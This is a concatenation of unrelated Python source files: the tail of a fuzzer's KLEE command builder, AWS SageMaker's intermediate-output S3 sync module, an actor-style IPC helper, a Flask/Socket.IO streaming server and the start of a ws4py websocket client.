                         "--named-seed-matching=true",
                         "--allow-external-sym-calls",
                         "--use-non-intrinsics-memops=false",
                         "--check-overshift=false",
                         "--only-output-states-covering-new=true"
                         ]
        common_prefix.append("--max-memory=0")
        if "AFLUnCovSearcher" in self.get_search_heuristics():
            common_prefix.append(afl_uncov + self.fuzzer_cov_file)
            # common_prefix.append(max_output + self.max_output)
        common_prefix.append(klee_out_uncov + out_cov_file)
        if "SANGuidedSearcher" in self.get_search_heuristics():
            common_prefix.append(sanitizer_searcher_flag)
        cmd.extend(common_prefix);
        #symbolic explorer by default need target edge ids
        for eid in edge_ids:
            cmd.append("--branchid-list=" + eid)
        cmd.append("--seed-out=" + ktest_seed)
        cmd.append(sync_dir_flag + sync_dir)
        cmd.append(self.target_bc)
        cmd.extend(self.options)
        if self.input_type == "stdin":
            cmd.append(stdin_sym_flag)
            cmd.append(str(stdin_len))
        else:
            # File-input mode: one symbolic file "A" of stdin_len bytes.
            cmd.append("A")
            cmd.append(file_sym_flag)
            cmd.append("1")
            cmd.append(str(stdin_len))
        return cmd

    def get_new_pid(self):
        # Mint the next internal instance id (not an OS pid).
        self.pid_ctr += 1
        return self.pid_ctr

    def call_converter(self, mode, afl_input, ktest, bitmodel, inputtype):
        """
        SEs directly invoke the converter to
        convert between the afl/klee file formats
        as the SE input format is specific to target SE engine
        """
        args = [];
        args.append(self.converter)
        args.append("--mode="+ mode)
        args.append("--afl-name="+afl_input)
        args.append("--ktest-name="+ktest)
        args.append("--bitmodel="+bitmodel);
        args.append("--inputmode="+inputtype);
        subprocess.Popen(args).wait()

    def terminate_callback(self):
        """called when SIGINT and SIGTERM"""
        se_info("packing klee error cases into [{0}]".format(self.klee_err_dir))
        utils.pack_klee_errors(self.target, self.klee_err_dir)

    def periodic_callback(self):
        """called every 1 hour"""
        pass
|
intermediate_output.py | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""This module contains functionality related to the storage of intermediate
training information in "opt/ml/output/intermediate".
"""
from __future__ import absolute_import
import concurrent.futures as futures
import multiprocessing
import os
import shutil
import time
import boto3
import boto3.s3.transfer as s3transfer
import inotify_simple
from six.moves.urllib.parse import urlparse
from sagemaker_training import environment, logging_config
logger = logging_config.get_logger()

# Canonical SageMaker paths: the watched intermediate dir, the job-status
# marker files, and the hidden temp dir used to stage files for S3 upload.
intermediate_path = environment.output_intermediate_dir  # type: str
failure_file_path = os.path.join(environment.output_dir, "failure")  # type: str
success_file_path = os.path.join(environment.output_dir, "success")  # type: str
tmp_dir_path = os.path.join(intermediate_path, ".tmp.sagemaker_s3_sync")  # type: str
def _timestamp():
"""Return a timestamp with microsecond precision."""
moment = time.time()
moment_us = repr(moment).split(".")[1]
return time.strftime("%Y-%m-%d-%H-%M-%S-{}".format(moment_us), time.gmtime(moment))
def _upload_to_s3(s3_uploader, relative_path, file_path, filename):
"""Upload a file to S3."""
try:
key = os.path.join(s3_uploader["key_prefix"], relative_path, filename)
s3_uploader["transfer"].upload_file(file_path, s3_uploader["bucket"], key)
except FileNotFoundError: # noqa ignore=F821
# Broken link or deleted
pass
except Exception: # pylint: disable=broad-except
logger.exception("Failed to upload file to s3.")
finally:
# delete the original file
if os.path.exists(file_path):
os.remove(file_path)
def _copy_file(executor, s3_uploader, relative_path, filename):
    """Snapshot a finished file into the sync temp dir and queue its upload."""
    try:
        source = os.path.join(intermediate_path, relative_path, filename)
        # A microsecond timestamp makes the staged name unique, so later
        # writes to the original cannot race the in-flight upload.
        stamped_name = "{}.{}".format(_timestamp(), filename)
        destination = os.path.join(tmp_dir_path, relative_path, stamped_name)
        shutil.copy2(source, destination)
        executor.submit(_upload_to_s3, s3_uploader, relative_path, destination, filename)
    except FileNotFoundError:  # noqa ignore=F821
        # The file disappeared before we could snapshot it (broken link or deleted).
        pass
    except Exception:  # pylint: disable=broad-except
        logger.exception("Failed to copy file to the temporary directory.")
def _watch(inotify, watchers, watch_flags, s3_uploader):
    """As soon as a user is done with a file under `/opt/ml/output/intermediate`
    we will be notified by inotify. We will copy this file under
    `/opt/ml/output/intermediate/.tmp.sagemaker_s3_sync` folder preserving
    the same folder structure to prevent it from being further modified.
    As we copy the file we will add timestamp with microseconds precision
    to avoid modification during s3 upload.
    After that we copy the file to s3 in a separate Thread.
    We keep the queue of the files we need to move as FIFO.
    """
    # initialize a thread pool with 1 worker
    # to be used for uploading files to s3 in a separate thread
    executor = futures.ThreadPoolExecutor(max_workers=1)
    # Two-step shutdown: when a success/failure marker appears we run one
    # more full pass before exiting (stop_file_exists -> last_pass_done).
    last_pass_done = False
    stop_file_exists = False
    # after we see stop file do one additional pass to make sure we didn't miss anything
    while not last_pass_done:  # pylint: disable=too-many-nested-blocks
        # wait for any events in the directory for 1 sec and then re-check exit conditions
        for event in inotify.read(timeout=1000):
            for flag in inotify_simple.flags.from_mask(event.mask):
                # if new directory was created traverse the directory tree to recursively add all
                # created folders to the watchers list.
                # Upload files to s3 if there any files.
                # There is a potential race condition if upload the file and the see a notification
                # for it which should cause any problems because when we copy files to temp dir
                # we add a unique timestamp up to microseconds.
                if flag is inotify_simple.flags.ISDIR and inotify_simple.flags.CREATE & event.mask:
                    path = os.path.join(intermediate_path, watchers[event.wd], event.name)
                    for folder, _, files in os.walk(path):
                        wd = inotify.add_watch(folder, watch_flags)
                        relative_path = os.path.relpath(folder, intermediate_path)
                        watchers[wd] = relative_path
                        # Mirror the folder structure inside the staging dir.
                        tmp_sub_folder = os.path.join(tmp_dir_path, relative_path)
                        if not os.path.exists(tmp_sub_folder):
                            os.makedirs(tmp_sub_folder)
                        for file in files:
                            _copy_file(executor, s3_uploader, relative_path, file)
                elif flag is inotify_simple.flags.CLOSE_WRITE:
                    _copy_file(executor, s3_uploader, watchers[event.wd], event.name)
        last_pass_done = stop_file_exists
        stop_file_exists = os.path.exists(success_file_path) or os.path.exists(failure_file_path)
    # wait for all the s3 upload tasks to finish and shutdown the executor
    executor.shutdown(wait=True)
def start_sync(
    s3_output_location, region, endpoint_url=None
):  # pylint: disable=inconsistent-return-statements
    """Start intermediate folder sync, which copies files from 'opt/ml/output/intermediate'
    directory to the provided s3 output location as files created or modified.

    If files are deleted, it doesn't delete them from s3.

    It starts intermediate folder behavior as a daemonic process only if the directory
    doesn't exist yet. If the directory does exist, it indicates that the platform is
    taking care of syncing files to S3 and the container should not interfere.

    Args:
        s3_output_location (str): S3 url ('s3://bucket/prefix') under which the
            intermediate output is uploaded; a 'file://' url disables syncing.
        region (str): AWS region used to create the S3 client.
        endpoint_url (str): An alternative endpoint URL to connect to.

    Returns:
        (multiprocessing.Process): The intermediate output sync daemonic process.
    """
    if not s3_output_location or os.path.exists(intermediate_path):
        logger.debug("Could not initialize intermediate folder sync to s3.")
        return None
    # create intermediate and intermediate_tmp directories
    os.makedirs(intermediate_path)
    os.makedirs(tmp_dir_path)
    # configure unique s3 output location similar to how SageMaker platform does it
    # or link it to the local output directory
    url = urlparse(s3_output_location)
    if url.scheme == "file":
        logger.debug("Local directory is used for output. No need to sync any intermediate output.")
        return None
    elif url.scheme != "s3":
        raise ValueError("Expecting 's3' scheme, got: %s in %s" % (url.scheme, url))
    # create s3 transfer client
    client = boto3.client("s3", region, endpoint_url=endpoint_url)
    s3_transfer = s3transfer.S3Transfer(client)
    s3_uploader = {
        "transfer": s3_transfer,
        "bucket": url.netloc,
        "key_prefix": os.path.join(
            url.path.lstrip("/"), os.environ.get("TRAINING_JOB_NAME", ""), "output", "intermediate"
        ),
    }
    # Add intermediate folder to the watch list
    inotify = inotify_simple.INotify()
    watch_flags = inotify_simple.flags.CLOSE_WRITE | inotify_simple.flags.CREATE
    watchers = {}
    wd = inotify.add_watch(intermediate_path, watch_flags)
    watchers[wd] = ""
    # start subprocess to sync any files from intermediate folder to s3
    p = multiprocessing.Process(target=_watch, args=[inotify, watchers, watch_flags, s3_uploader])
    # Make the process daemonic as a safety switch to prevent training job from hanging forever
    # in case if something goes wrong and main container process exits in an unexpected way
    p.daemon = True
    p.start()
    return p
|
ipc.py | import sys
import threading
from multiprocessing import Queue, Pipe, Process
if sys.platform == 'win32':
from multiprocessing.reduction import reduce_pipe_connection as reduce_connection
from multiprocessing.reduction import rebuild_pipe_connection as rebuild_connection
else:
from multiprocessing.reduction import reduce_connection, rebuild_connection
class Actor(object):
    """Mailbox-based actor: requests arrive on a multiprocessing Queue and the
    reply travels back over a one-shot Pipe connection, reduced/rebuilt so it
    can be pickled across process boundaries."""

    def __init__(self):
        self.inbox = Queue()
        self.shared_data = {}

    def share(self, name, value):
        # Publish a value that other code can read via get().
        self.shared_data[name] = value

    def get(self, name):
        return self.shared_data.get(name, None)

    def _ask(self, msg, args=(), kwargs={}):
        # Synchronous request/response round trip.  NOTE(review): mutable
        # default kwargs -- harmless here because it is never mutated.
        i, o = Pipe()
        # Reduce the connection so it survives pickling onto the Queue.
        reduced = reduce_connection(i)
        self.inbox.put([msg, args, kwargs, reduced[1]])
        ret = o.recv()  # blocks until the handler replies
        i.close()
        o.close()
        return ret

    def _do(self, handler, chan, args, kwargs):
        # Run one handler; send back its result, or the exception object.
        try:
            ret = handler(*args, **kwargs)
            if chan:
                chan = rebuild_connection(*chan)
                chan.send(ret)
                chan.close()
        except Exception, e:
            if chan:
                chan = rebuild_connection(*chan)
                chan.send(e)
                chan.close()

    def _handle(self, msg_handlers):
        # Dispatch loop: one daemon thread per message, until "quit".
        while True:
            (msg, args, kwargs, chan) = self.inbox.get()
            if msg == "quit":
                break
            try:
                handler = msg_handlers[msg]
                t = threading.Thread(target=self._do, args=(handler, chan, args, kwargs))
                t.daemon = True
                t.start()
            except:
                # Unknown message name is silently dropped.  NOTE(review):
                # the asker would then block forever on recv -- confirm intended.
                pass

    def _start(self, holder):
        # Collect the holder's IPC_* methods as the message handler table.
        msg_handlers = dict(
            [(m, getattr(holder, m)) for m in dir(holder) if m.startswith("IPC_")]
        )
        t = threading.Thread(target=self._handle, args=(msg_handlers,))
        t.daemon = True
        t.start()

    def _quit(self):
        self.inbox.put(["quit", (), {}, None])

    def __getattr__(self, name):
        # Proxy: actor.IPC_xxx(...) becomes a synchronous _ask round trip.
        def _(*args, **kwargs):
            return self._ask(name, args, kwargs)
        if name.startswith("IPC_"):
            return _
        else:
            raise AttributeError
class ActorObject(object):
    """Mixin giving an object an actor reference that dispatches its IPC_* methods."""

    def __init__(self):
        self._ref = Actor()

    def start_actor(self):
        # Begin handling IPC_* calls on background threads.
        self._ref._start(self)

    def quit_actor(self):
        self._ref._quit()

    def ref(self):
        # Handle callers use to invoke IPC_* methods (possibly cross-process).
        return self._ref
class ActorProcess(ActorObject):
    """ActorObject whose run() loop executes in a daemonic child process."""

    def __init__(self):
        super(ActorProcess, self).__init__()
        self.process = None

    def _run(self):
        # in child process, start IPC_ref, so parent can invoke IPC_xxx interfaces.
        try:
            self.start_actor()
            self.run()
        except KeyboardInterrupt:
            print "interrupt received ..."

    def run(self):
        # Subclasses implement the child process main loop.
        raise NotImplementedError

    def start(self):
        self.process = Process(target=self._run)
        self.process.daemon = True
        self.process.start()

    def join(self):
        if self.process:
            self.process.join()

    def terminate(self):
        # Ask the actor loop to stop, then kill the child process.
        self.quit_actor()
        if self.process:
            self.process.terminate()

    def is_alive(self):
        if self.process:
            return self.process.is_alive()
        else:
            return False
if __name__ == "__main__":
    # Smoke test: two actor processes plus one in-process actor object.
    import time
    import os

    class P1(ActorProcess):
        def run(self):
            while True:
                time.sleep(1)
        def IPC_hello(self):
            return "Hello, I am P1 running at " + str(os.getpid())

    class P2(ActorProcess):
        def run(self):
            while True:
                time.sleep(1)
        def IPC_hello(self):
            return "Hello, I am P2 running at " + str(os.getpid())

    class O1(ActorObject):
        def IPC_hello(self):
            return "Hello, I am O3 running at " + str(os.getpid())

    p1 = P1()
    p2 = P2()
    p1.start()
    p2.start()
    print "main process %d" % os.getpid()
    print p1.ref().IPC_hello()
    print p2.ref().IPC_hello()
    p1.terminate()
    p1.join()
    p2.terminate()
    p2.join()
    o1 = O1()
    o1.start_actor()
    print o1.ref().IPC_hello()
|
server.py | from flask import Flask, jsonify, request, Response, abort, Blueprint
from flask_socketio import SocketIO
from flask_cors import CORS
import random
import logging
import pkgutil
import threading
import click
import time
from colorama import Fore, Back, Style
# Quiet werkzeug's per-request logging.
flask_log = logging.getLogger("werkzeug")
flask_log.setLevel(logging.ERROR)

def secho(text, file=None, nl=None, err=None, color=None, **styles):
    """No-op replacement for click.secho (suppresses Flask's CLI output)."""
    pass

def echo(text, file=None, nl=None, err=None, color=None, **styles):
    """No-op replacement for click.echo (suppresses Flask's CLI output)."""
    pass

# Monkey-patch click so Flask's startup banner is silenced.
click.echo = echo
click.secho = secho
from ..stream import Stream
from ..source import Source

app = Flask(__name__)
CORS(app)  # allow the browser client to call the API cross-origin
sio = SocketIO(app)

api_version = '/v0'
# All routes below are registered on this blueprint.
api = Blueprint('api', __name__)
@api.get("/")
def index():
    """Root endpoint: returns a greeting with a random number in the payload."""
    return jsonify(msg=f"says hello and {random.random()}")
@api.get("/ping")
def ping():
    """Health-check endpoint: returns a random pong value."""
    return jsonify(pong=random.randint(1, 100))
@api.get("/start")
def start():
    """Start the stream named by the ``stream_name`` url parameter.

    Returns the stream_status so the client can retrieve the latest state.
    Error responses: 400 for a missing/empty/mistyped name or a failed start,
    404 when no stream with that name exists.
    """
    # first, check the request has parameter arguments
    if request.args:
        # NB for request arg this is an ImmutableMultiDict from werkzeug, so can access using ['key'] format
        # but it generates its own error messages if a key is not found, this is useful in general, but complicates
        # things in this case, so we convert to regular dictionary, so this keeps code handling args
        # keys similar to handling json keys
        data = dict(request.args)
    else:
        return (
            jsonify(
                msg=f"RequestError: request must contain url arguments (probably missing 'stream_name')"
            ),
            400,
        )
    try:
        stream_name = data["stream_name"]
        if not stream_name:
            raise ValueError("'stream_name' must not be empty")
    except KeyError as e:
        return (
            jsonify(msg=f"missing key: {str(e)}"),
            400,
        )
    except ValueError as e:
        return (
            jsonify(msg=f"value error: {str(e)}"),
            400,
        )
    # check that the value of stream_name is of type 'str'
    if not isinstance(stream_name, str):
        # BUG FIX: the message previously said "must be an integer" although
        # the check requires a string; also return a 400 instead of 200.
        return (
            jsonify(
                msg=f"TypeError: stream name (stream_name) must be a string; supplied value was of type {type(stream_name)}"
            ),
            400,
        )
    for stream in streams:
        if stream.name == stream_name:
            try:
                stream.start()
                return jsonify(stream.stream_status)
            except ValueError as e:
                return (
                    jsonify(msg=f"{str(e)}"),
                    400,
                )
    return (
        jsonify(
            msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
        ),
        404,
    )
@api.get("/stop")
def stop():
    """Stop the stream named by the 'stream_name' url parameter.

    Returns the stream_status dict so the client can retrieve the latest
    state; 400 on a bad request, 404 when no such stream exists.
    """
    # request.args is werkzeug's ImmutableMultiDict; convert to a plain dict
    # so the key handling below matches the json-payload routes.
    if request.args:
        data = dict(request.args)
    else:
        return (
            jsonify(
                msg=f"RequestError: request must contain url arguments (probably missing 'stream_name')"
            ),
            400,
        )
    try:
        stream_name = data["stream_name"]
        if not stream_name:
            raise ValueError("'stream_name' must not be empty")
    except KeyError as e:
        return (
            jsonify(msg=f"missing key: {str(e)}"),
            400,
        )
    except ValueError as e:
        return (
            jsonify(msg=f"value error: {str(e)}"),
            400,
        )
    # fix: the message previously said "must be an integer" while checking
    # for str, and the response lacked its 400 status code
    if not isinstance(stream_name, str):
        return (
            jsonify(
                msg=f"TypeError: stream name (stream_name) must be a string; supplied value was of type {type(stream_name)}"
            ),
            400,
        )
    for stream in streams:
        if stream.name == stream_name:
            try:
                stream.stop()
                return jsonify(stream.stream_status)
            except ValueError as e:
                # Stream.stop signals "already stopped" etc. via ValueError
                return (
                    jsonify(msg=f"{str(e)}"),
                    400,
                )
    return (
        jsonify(
            msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
        ),
        404,
    )
@api.get("/stream_status")
def stream_status():
    """Return the current state of the stream named by 'stream_name'.

    Reads the stream_status @property (not a method to call); 400 on a bad
    request, 404 when no such stream exists.
    """
    # request.args is werkzeug's ImmutableMultiDict; convert to a plain dict
    # so the key handling below matches the json-payload routes.
    if request.args:
        data = dict(request.args)
    else:
        return (
            jsonify(
                msg=f"RequestError: request must contain url arguments (probably missing 'stream_name')"
            ),
            400,
        )
    try:
        stream_name = data["stream_name"]
        if not stream_name:
            raise ValueError("'stream_name' must not be empty")
    except KeyError as e:
        return (
            jsonify(msg=f"missing key: {str(e)}"),
            400,
        )
    except ValueError as e:
        return (
            jsonify(msg=f"value error: {str(e)}"),
            400,
        )
    # fix: the message previously said "must be an integer" while checking
    # for str, and the response lacked its 400 status code
    if not isinstance(stream_name, str):
        return (
            jsonify(
                msg=f"TypeError: stream name (stream_name) must be a string; supplied value was of type {type(stream_name)}"
            ),
            400,
        )
    for stream in streams:
        if stream.name == stream_name:
            # the failure type of the property read is unknown as of
            # writing, so the broad except is deliberate here
            try:
                return jsonify(stream.stream_status)
            except Exception as e:
                return (
                    jsonify(msg=f"{str(e)}"),
                    400,
                )
    return (
        jsonify(
            msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
        ),
        404,
    )
@api.get("/source")
def get_source():
    """Return the state of the Source whose name matches 'stream_name'.

    Reads the get_source_state @property; 400 on a bad request, 404 when
    the source does not exist.
    """
    # request.args is werkzeug's ImmutableMultiDict; convert to a plain dict
    # so the key handling below matches the json-payload routes.
    if request.args:
        data = dict(request.args)
        try:
            stream_name = data["stream_name"]
            if not stream_name:
                raise ValueError("'stream_name' must not be empty")
        except KeyError as e:
            return (
                jsonify(msg=f"missing key: {str(e)}"),
                400,
            )
        except ValueError as e:
            return (
                jsonify(msg=f"value error: {str(e)}"),
                400,
            )
        # fix: the message previously said "must be an integer" while
        # checking for str, and the response lacked its 400 status code
        if not isinstance(stream_name, str):
            return (
                jsonify(
                    msg=f"TypeError: stream name (stream_name) must be a string; supplied value was of type {type(stream_name)}"
                ),
                400,
            )
        for source in sources:
            if source.name == stream_name:
                # failure type of the property read is unknown as of
                # writing, so the broad except is deliberate here
                try:
                    return jsonify(source.get_source_state)
                except Exception as e:
                    return (
                        jsonify(msg=f"{str(e)}"),
                        400,
                    )
        return (
            jsonify(
                msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
            ),
            404,
        )
    else:
        # NOTE this will be dropped to return all source instances in the
        # sources list eventually
        return (
            jsonify(
                msg=f"RequestError: request must contain url arguments (probably missing 'stream_name')"
            ),
            400,
        )
@api.patch("/freq")
def freq():
    """Set a stream's emission frequency (milliseconds, e.g. 1200).

    Expects a json payload with 'stream_name' and 'new_freq'; applies it
    via stream.set_freq and returns the refreshed stream_status.
    """
    if request.json:
        data = request.json
    else:
        return (
            jsonify(msg=f"RequestError: request must contain a json payload"),
            400,
        )
    # check all keys are present and have a (truthy) value
    try:
        stream_name = data["stream_name"]
        if not stream_name:
            raise ValueError("'stream_name' must not be empty")
        new_freq = data["new_freq"]
        if not new_freq:
            raise ValueError("'new_freq' must not be zero")
    except KeyError as e:
        return (
            jsonify(msg=f"missing key: {str(e)}"),
            400,
        )
    except ValueError as e:
        return (
            jsonify(msg=f"value error: {str(e)}"),
            400,
        )
    # fix: the message previously said "must be an integer" while checking
    # for str, and the response lacked its 400 status code. Stream instances
    # type-check their own properties beyond this.
    if not isinstance(stream_name, str):
        return (
            jsonify(
                msg=f"TypeError: stream name (stream_name) must be a string; supplied value was of type {type(stream_name)}"
            ),
            400,
        )
    for stream in streams:
        if stream.name == stream_name:
            try:
                stream.set_freq(new_freq)
                return jsonify(stream.stream_status)
            except (ValueError, TypeError) as e:
                return (
                    jsonify(msg=f"{str(e)}"),
                    400,
                )
    return (
        jsonify(
            msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
        ),
        404,
    )
@api.patch("/start_burst")
def start_burst():
    """Trigger a burst on a stream via its start_burst() setter method.

    Expects a json payload with 'stream_name'; returns the refreshed
    stream_status.
    """
    if request.json:
        data = request.json
    else:
        return (
            jsonify(msg=f"RequestError: request must contain a json payload"),
            400,
        )
    # check all keys are present and have a (truthy) value
    try:
        stream_name = data["stream_name"]
        if not stream_name:
            raise ValueError("'stream_name' must not be empty")
    except KeyError as e:
        return (
            jsonify(msg=f"missing key: {str(e)}"),
            400,
        )
    except ValueError as e:
        return (
            jsonify(msg=f"value error: {str(e)}"),
            400,
        )
    # fix: the message previously said "must be an integer" while checking
    # for str, and the response lacked its 400 status code. Stream instances
    # type-check their own properties beyond this.
    if not isinstance(stream_name, str):
        return (
            jsonify(
                msg=f"TypeError: stream name (stream_name) must be a string; supplied value was of type {type(stream_name)}"
            ),
            400,
        )
    for stream in streams:
        if stream.name == stream_name:
            try:
                stream.start_burst()
                return jsonify(stream.stream_status)
            except (ValueError, TypeError) as e:
                return (
                    jsonify(msg=f"{str(e)}"),
                    400,
                )
    return (
        jsonify(
            msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
        ),
        404,
    )
@api.patch("/burst_freq")
def burst_freq():
    """Set a stream's burst frequency via its set_burst_freq method.

    Expects a json payload with 'stream_name' and 'burst_freq'; returns the
    refreshed stream_status.
    """
    if request.json:
        data = request.json
    else:
        return (
            jsonify(msg=f"RequestError: request must contain a json payload"),
            400,
        )
    # check all keys are present and have a (truthy) value
    try:
        stream_name = data["stream_name"]
        if not stream_name:
            raise ValueError("'stream_name' must not be empty")
        burst_freq = data["burst_freq"]
        if not burst_freq:
            raise ValueError("'burst_freq' must not be zero")
    except KeyError as e:
        return (
            jsonify(msg=f"missing key: {str(e)}"),
            400,
        )
    except ValueError as e:
        return (
            jsonify(msg=f"value error: {str(e)}"),
            400,
        )
    # fix: the message previously said "must be an integer" while checking
    # for str, and the response lacked its 400 status code. Stream instances
    # type-check their own properties beyond this.
    if not isinstance(stream_name, str):
        return (
            jsonify(
                msg=f"TypeError: stream name (stream_name) must be a string; supplied value was of type {type(stream_name)}"
            ),
            400,
        )
    for stream in streams:
        if stream.name == stream_name:
            try:
                stream.set_burst_freq(burst_freq)
                return jsonify(stream.stream_status)
            except (ValueError, TypeError) as e:
                return (
                    jsonify(msg=f"{str(e)}"),
                    400,
                )
    return (
        jsonify(
            msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
        ),
        404,
    )
@api.patch("/burst_vol")
def burst_vol():
    """Set a stream's burst volume via its set_burst_vol method.

    Expects a json payload with 'stream_name' and 'burst_vol'; returns the
    refreshed stream_status.
    """
    if request.json:
        data = request.json
    else:
        return (
            jsonify(msg=f"RequestError: request must contain a json payload"),
            400,
        )
    # check all keys are present and have a (truthy) value
    try:
        stream_name = data["stream_name"]
        if not stream_name:
            raise ValueError("'stream_name' must not be empty")
        burst_vol = data["burst_vol"]
        if not burst_vol:
            raise ValueError("'burst_vol' must not be zero")
    except KeyError as e:
        return (
            jsonify(msg=f"missing key: {str(e)}"),
            400,
        )
    except ValueError as e:
        return (
            jsonify(msg=f"value error: {str(e)}"),
            400,
        )
    # fix: the message previously said "must be an integer" while checking
    # for str, and the response lacked its 400 status code. Stream instances
    # type-check their own properties beyond this.
    if not isinstance(stream_name, str):
        return (
            jsonify(
                msg=f"TypeError: stream name (stream_name) must be a string; supplied value was of type {type(stream_name)}"
            ),
            400,
        )
    for stream in streams:
        if stream.name == stream_name:
            try:
                stream.set_burst_vol(burst_vol)
                return jsonify(stream.stream_status)
            except (ValueError, TypeError) as e:
                return (
                    jsonify(msg=f"{str(e)}"),
                    400,
                )
    return (
        jsonify(
            msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
        ),
        404,
    )
@api.patch("/source")
def patch_source():
    """Update a single setting on a Source instance.

    Required json keys: 'stream_name' (the source's name), 'config_area',
    'setting', 'new_setting_val'. Optional: 'field_name'. Returns the
    refreshed source state; 400 on a bad request, 404 on unknown source.
    """
    if request.json:
        data = request.json
    else:
        return (
            jsonify(msg=f"RequestError: request must contain a json payload"),
            400,
        )
    # required keys: present and (except new_setting_val) non-empty
    try:
        # NOTE: the client sends the source's name under the 'stream_name' key
        source_name = data["stream_name"]
        if not source_name:
            raise ValueError("'stream_name' must not be empty")
        config_area = data["config_area"]
        if not config_area:
            raise ValueError(f"'config_area' cannot be blank for a patch")
        setting = data["setting"]
        if not setting:
            raise ValueError("'setting' must not be empty")
        new_setting_val = data["new_setting_val"]
    except KeyError as e:
        return (
            jsonify(msg=f"missing key: {str(e)}"),
            400,
        )
    except ValueError as e:
        return (
            jsonify(msg=f"value error: {str(e)}"),
            400,
        )
    except Exception as e:
        # fix: the message previously misspelled "unknown"
        return (
            jsonify(msg=f"unknown error: {str(e)}"),
            400,
        )
    # optional key: 'field_name' may be absent, but if present needs a value
    try:
        field_name = data["field_name"]
        if not field_name:
            raise ValueError("'field_name' must not be empty")
    except KeyError:
        field_name = None
    except ValueError as e:
        return (
            jsonify(msg=f"value error: {str(e)}"),
            400,
        )
    # fix: grammar ("an string") and the missing 400 status code. Source
    # instances type-check their own properties beyond this.
    if not isinstance(source_name, str):
        return (
            jsonify(
                msg=f"TypeError: source name {source_name} must be a string; supplied value was of type {type(source_name)}"
            ),
            400,
        )
    for source in sources:
        if source.name == source_name:
            try:
                source.set_source_element(
                    config_area=config_area,
                    field_name=field_name,
                    setting=setting,
                    new_setting_val=new_setting_val,
                )
            except (ValueError, TypeError) as e:
                return (
                    jsonify(msg=f"{str(e)}"),
                    400,
                )
            except Exception as e:
                return (
                    jsonify(msg=f"unknown error {str(e)}"),
                    400,
                )
            else:
                return jsonify(source.get_source_state)
    return (
        jsonify(
            msg=f"ValueError: seems like stream '{source_name}' has not been created...?"
        ),
        404,
    )
@app.route("/ui", defaults={"path": ""})
@app.route("/<path:path>")
def catch_all(path):
    """Serve the bundled single-page UI and its static assets.

    Known asset extensions are served from the 'headwaters' package data
    with their proper mimetype; anything else falls through to index.html.
    """
    # fix: .ico was served as "text/application", which is not a valid
    # mimetype; icons are image/x-icon
    asset_mimetypes = {
        ".js": "text/javascript",
        ".css": "text/css",
        ".ico": "image/x-icon",
        ".svg": "image/svg+xml",
    }
    logging.info(f"request on ui/ to {path}")
    for extension, mimetype in asset_mimetypes.items():
        if path.endswith(extension):
            r = pkgutil.get_data("headwaters", f"{path}")
            return Response(r, mimetype=mimetype)
    # SPA fallback: every unknown path gets the index page
    r = pkgutil.get_data("headwaters.ui", "index.html")
    return Response(r, mimetype="text/html")
@sio.on("connect")
def connect_hndlr():
    """Log each new Socket.IO client connection."""
    # fix: @sio.event("connect") passes the string into the handler
    # registration arguments instead of naming the event; @sio.on("connect")
    # registers for the connect event explicitly. Also, the SocketIO server
    # object has no .sid — flask_socketio exposes the per-client session id
    # as request.sid during event handling.
    logging.info(f"sio connection rcvd {request.sid}")
# Registries populated by run(); the routes above look streams/sources up
# by name in these lists.
streams = []
sources = []
# fix: api_version already starts with '/', so f"/api/{api_version}" produced
# the double-slash prefix "/api//v0" instead of the advertised "/api/v0"
app.register_blueprint(api, url_prefix=f"/api{api_version}")
def run(selected_sources):
    """Build a Source and a Stream per requested source name, start one
    worker thread per stream, serve the app, and stop all streams on exit.

    :param selected_sources: iterable of source names to resolve via Source
    """
    for selected_source in selected_sources:
        try:
            source = Source(selected_source)
        except FileNotFoundError:
            # unknown source name: warn in yellow and continue with the rest
            print(
                Fore.YELLOW
                + f" source name '{selected_source}' not resolved in schema lookup"
                + Style.RESET_ALL
            )
            print()
            continue
        sources.append(source)
        streams.append(Stream(source, sio))
    # one thread per stream drives Stream.flow concurrently
    stream_threads = []
    for stream in streams:
        stream_threads.append(threading.Thread(target=stream.flow))
    for stream_thread in stream_threads:
        stream_thread.start()
    port = 5555  # set up a config file
    print(
        Fore.GREEN
        + Style.BRIGHT
        + f"STREAMS: http://127.0.0.1:{port}/api/v0"
        + Style.RESET_ALL
    )
    print(
        Fore.CYAN + Style.BRIGHT + f"UI: http://127.0.0.1:{port}/ui" + Style.RESET_ALL
    )
    print()
    print(Style.DIM + "(CTRL-C to stop)" + Style.RESET_ALL)
    # blocks here until the server exits (e.g. CTRL-C)
    sio.run(app, debug=False, port=port)
    print()
    print(Fore.RED + Style.BRIGHT + f"Stopping streams..." + Style.RESET_ALL)
    for stream in streams:
        try:
            stream.stop()
            print(Fore.RED + f" stopped stream '{stream.name}'" + Style.RESET_ALL)
        except ValueError as e:
            # stop() raises ValueError when the stream was not running
            print(
                Fore.RED
                + f" stream '{stream.name}' already stopped"
                + Style.RESET_ALL
            )
    print()
|
threadedclient.py | # -*- coding: utf-8 -*-
import threading
from ws4py.client import WebSocketBaseClient
__all__ = ['WebSocketClient']
class WebSocketClient(WebSocketBaseClient):
    # Runs the websocket's read loop on a dedicated daemon thread so the
    # caller's thread stays free after connect().
    def __init__(self, url, protocols=None, extensions=None, heartbeat_freq=None,
                 ssl_options=None, headers=None, exclude_headers=None):
        """
        .. code-block:: python

           from ws4py.client.threadedclient import WebSocketClient

           class EchoClient(WebSocketClient):
               def opened(self):
                  for i in range(0, 200, 25):
                     self.send("*" * i)

               def closed(self, code, reason):
                  print(("Closed down", code, reason))

               def received_message(self, m):
                  print("=> %d %s" % (len(m), str(m)))

           try:
               ws = EchoClient('ws://localhost:9000/echo', protocols=['http-only', 'chat'])
               ws.connect()
           except KeyboardInterrupt:
              ws.close()
        """
        WebSocketBaseClient.__init__(self, url, protocols, extensions, heartbeat_freq,
